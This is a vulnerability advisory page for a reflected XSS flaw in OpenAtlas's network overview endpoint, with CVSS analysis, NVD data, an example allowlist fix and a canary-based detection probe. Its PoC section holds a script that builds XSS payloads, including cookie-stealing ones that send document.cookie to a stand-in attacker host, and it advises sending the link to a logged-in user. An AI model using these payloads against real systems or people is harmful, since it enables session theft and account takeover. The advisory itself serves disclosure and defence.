Security Vulnerability Report
CVE-2025-60917 CVSS 4.6 MEDIUM

CVE-2025-60917

Published: 2025-11-24 16:15:51
Last Modified: 2025-11-28 16:22:58

Description

A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows an attacker to execute arbitrary script in the context of a user's browser by injecting a crafted payload into the color parameter. Because the flaw is reflected rather than stored, exploitation requires a victim to open a crafted link; per the CVSS vector below the attack also presupposes a low-privileged (logged-in) session on the affected instance.
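To make the CWE-79 pattern concrete, the following is an added example (not OpenAtlas source, and not code from the advisory) of a hypothetical handler that reflects a colour parameter the vulnerable way, next to a hardened version that validates the value against an allowlist before escaping it on output. The markup, function names, named-colour list and the sample payload are all assumptions made for illustration.

```python
import html
import re

# Constructed sample input, following the payload pattern used in the PoC.
XSS_PAYLOAD = '<img src=x onerror=alert(document.cookie)>'


# Hypothetical rendering for a /overview/network/ page. Not OpenAtlas code;
# the markup is invented only to show where the parameter lands.
def render_network_vulnerable(color: str) -> str:
    """Reflects the query parameter into the page without validation or
    output encoding: the CWE-79 pattern described in the advisory."""
    return (f'<div class="network" style="background:{color}">'
            f'<span>Selected colour: {color}</span></div>')


HEX_COLOR = re.compile(r'^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$')
# Assumed allowlist of CSS colour names the application accepts.
NAMED_COLORS = frozenset({'black', 'white', 'red', 'green', 'blue',
                          'gray', 'orange', 'purple'})
DEFAULT_COLOR = '#000000'


def normalise_color(color) -> str:
    """Allowlist validation: only a #rgb/#rrggbb triplet or a known colour
    name survives; anything else (including non-strings) falls back to the
    default colour."""
    if not isinstance(color, str):
        return DEFAULT_COLOR
    value = color.strip().lower()
    if HEX_COLOR.match(value) or value in NAMED_COLORS:
        return value
    return DEFAULT_COLOR


def render_network_fixed(color: str) -> str:
    """Validate first, then escape on output. The allowlist alone already
    rejects this payload; html.escape is defence in depth for the day the
    allowlist is loosened."""
    safe = html.escape(normalise_color(color), quote=True)
    return (f'<div class="network" style="background:{safe}">'
            f'<span>Selected colour: {safe}</span></div>')


def contains_payload(page: str, payload: str = XSS_PAYLOAD) -> bool:
    """True if the payload appears verbatim in the page, i.e. the browser
    would parse it as markup."""
    return payload in page


if __name__ == '__main__':
    print('vulnerable:', render_network_vulnerable(XSS_PAYLOAD))
    print('fixed:     ', render_network_fixed(XSS_PAYLOAD))
```

The allowlist matters here beyond escaping: the value lands inside a style attribute, a CSS context where entity encoding alone is not the whole story, so restricting the input to a known colour grammar is the robust fix.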

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Reading the vector: the endpoint is reachable over the network with low attack complexity, but Privileges Required is Low (a logged-in Openatlas session is involved, which is also what the PoC below assumes of the victim) and User Interaction is Required (the victim must open the crafted link). Scope is unchanged, with low confidentiality and integrity impact and no availability impact, which is why the score lands at MEDIUM rather than higher.

Configurations (Affected Products)

cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:* - VULNERABLE
Openatlas < v8.12.0

Note: the description and the line above give the affected range as versions before v8.12.0, while the NVD CPE match in the raw JSON below uses versionEndIncluding 8.12.0. Confirm against the vendor's release notes before treating an installation of exactly 8.12.0 as fixed.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60917 PoC - Openatlas Reflected XSS
# Target: Openatlas before v8.12.0
# Endpoint: /overview/network/?color=<payload>
#
# Caveat: the payloads below assume the parameter is reflected into an HTML
# text context. If the reflection lands inside an attribute value or a CSS
# rule, the payload must be adapted to break out of that context first.
import urllib.parse


def generate_xss_payload():
    """Generate XSS payload for CVE-2025-60917"""
    # Basic XSS payload using img onerror
    payload = '<img src=x onerror=alert(document.cookie)>'
    return urllib.parse.quote(payload)


def generate_poc_url(target_url):
    """Generate PoC URL for the vulnerability"""
    payload = generate_xss_payload()
    # rstrip avoids a double slash when the base URL already ends with '/'
    poc_url = f"{target_url.rstrip('/')}/overview/network/?color={payload}"
    return poc_url


def generate_stealer_payload():
    """Generate cookie stealer payload"""
    # Cookie stealing payload; only works if the session cookie is not HttpOnly
    stealer_code = '''<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">'''
    return urllib.parse.quote(stealer_code)


def generate_session_hijack_payload():
    """Generate session hijacking payload"""
    # A <script> tag only executes when parsed as part of the document;
    # it will not run if the server inserts the value via innerHTML.
    payload = '''<script>
fetch('https://attacker.com/log?data='+btoa(document.cookie));
</script>'''
    return urllib.parse.quote(payload)


if __name__ == '__main__':
    target = 'http://target-openatlas.com'
    poc_url = generate_poc_url(target)
    print(f"Target: {target}")
    print(f"PoC URL: {poc_url}")
    print("\nUsage: Send this URL to a logged-in user")
    print("When visited, the payload will execute JavaScript")
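Before firing an alert() or cookie-stealing payload at a production instance, a tester usually wants a non-destructive confirmation that the parameter is reflected unescaped at all. The following is an added example, not part of the advisory or the PoC above: it sends a harmless canary tag into the color parameter and classifies how the response handles it. The endpoint and parameter names come from the advisory text; the helper names, the sample responses and the cookie-based session handling are assumptions.

```python
import secrets
import urllib.parse
import urllib.request
from html import escape

# Taken from the advisory: vulnerable path and parameter name.
ENDPOINT = '/overview/network/'
PARAM = 'color'


def make_canary(token: str = '') -> str:
    """Build a harmless probe: an unknown HTML tag carrying a random token.
    Reflected raw, a browser renders nothing (no alert, no outbound request),
    but intact angle brackets in the response prove output encoding is absent."""
    token = token or secrets.token_hex(6)
    return f'<xss{token}>'


def build_probe_url(base_url: str, canary: str) -> str:
    """URL-encode the canary into the color parameter of the endpoint."""
    query = urllib.parse.urlencode({PARAM: canary})
    return f"{base_url.rstrip('/')}{ENDPOINT}?{query}"


def classify_reflection(body: str, canary: str) -> str:
    """Classify how the server treated the canary:
      'raw'      - brackets intact: reflected unescaped (vulnerable pattern)
      'escaped'  - only an HTML-entity-encoded form is present
      'stripped' - token present but the tag brackets were removed
      'absent'   - the parameter is not reflected at all
    """
    token = canary[1:-1]
    if canary in body:
        return 'raw'
    lowered = body.lower()
    for form in (escape(canary), f'&#60;{token}&#62;', f'&#x3c;{token}&#x3e;'):
        if form.lower() in lowered:
            return 'escaped'
    if token in body:
        return 'stripped'
    return 'absent'


def probe(base_url: str, session_cookie: str, timeout: float = 10.0) -> dict:
    """Live check against an instance you are authorised to test. The
    endpoint needs an authenticated session (CVSS PR:L), so the caller
    supplies the Cookie header value. Only this function touches the
    network; the classifier works on any captured response body."""
    canary = make_canary()
    url = build_probe_url(base_url, canary)
    req = urllib.request.Request(
        url, headers={'Cookie': session_cookie,
                      'User-Agent': 'cve-2025-60917-probe'})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode('utf-8', errors='replace')
    return {'url': url, 'canary': canary,
            'result': classify_reflection(body, canary)}


# Constructed sample responses (not real Openatlas output) for offline use.
CANARY = make_canary('deadbeef0000')
SAMPLE_VULNERABLE = (f'<html><body><div style="background:{CANARY}">'
                     f'net</div></body></html>')
SAMPLE_FIXED = (f'<html><body><div style="background:{escape(CANARY)}">'
                f'net</div></body></html>')

if __name__ == '__main__':
    print(build_probe_url('https://openatlas.example', CANARY))
    print('vulnerable sample ->', classify_reflection(SAMPLE_VULNERABLE, CANARY))
    print('fixed sample      ->', classify_reflection(SAMPLE_FIXED, CANARY))
```

A 'raw' result establishes missing output encoding, not exploitability: if the reflection sits inside an attribute or a style rule, a context-specific payload is still needed, which is exactly the caveat noted in the PoC above.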

References

https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-xss-in-farb-feldern-ort/ (Third Party Advisory)
https://www.sec4you-pentest.com/schwachstellen/ (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-60917",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-24T16:15:51.190",
    "lastModified": "2025-11-28T16:22:57.727",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the color parameter."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "8.12.0",
                "matchCriteriaId": "31077621-F722-46FF-9FFA-CD3D23CD1479"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-xss-in-farb-feldern-ort/",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.sec4you-pentest.com/schwachstellen/",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}